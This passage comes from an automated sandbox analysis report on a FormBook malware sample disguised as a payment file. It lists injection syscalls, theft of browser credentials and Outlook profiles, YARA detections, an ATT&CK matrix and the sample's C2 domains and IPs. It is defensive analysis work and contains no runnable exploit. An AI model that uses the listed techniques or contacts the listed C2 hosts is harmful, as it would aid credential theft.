            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 1600Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PAGO $830.900.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 308C008Jump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DD1145
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00D7445D
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D8EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_00D8EFAD
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDE2D7 mouse_event,0_2_00DDE2D7
            Source: C:\Users\user\Desktop\PAGO $830.900.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAGO $830.900.exe"Jump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DD0AA6
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DD15A7 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00DD15A7
            Source: PAGO $830.900.exeBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s#comments-end#ceCALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEG
            Source: XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: PAGO $830.900.exe, XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D90618 cpuid 0_2_00D90618
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE80B3 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00DE80B3
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DCDA16 GetUserNameW,0_2_00DCDA16
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DAB8F2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00DAB8F2
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D7615E

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PAGO $830.900.exeBinary or memory string: WIN_81
            Source: PAGO $830.900.exeBinary or memory string: WIN_XP
            Source: PAGO $830.900.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PAGO $830.900.exeBinary or memory string: WIN_XPe
            Source: PAGO $830.900.exeBinary or memory string: WIN_VISTA
            Source: PAGO $830.900.exeBinary or memory string: WIN_7
            Source: PAGO $830.900.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DF112B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00DF112B
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DF172D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00DF172D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1513227 Sample: PAGO $830.900.exe Startdate: 18/09/2024 Architecture: WINDOWS Score: 100 28 www.woshop.online 2->28 30 www.tekilla.wtf 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 7 other signatures 2->48 10 PAGO $830.900.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 XXOIkqUXwzoOEy.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 XXOIkqUXwzoOEy.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.nobartv6.website 103.224.182.242, 53651, 53652, 53653 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->34 36 www.kexweb.top 63.250.47.40, 53631, 53632, 53633 NAMECHEAP-NETUS United States 22->36 38 10 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

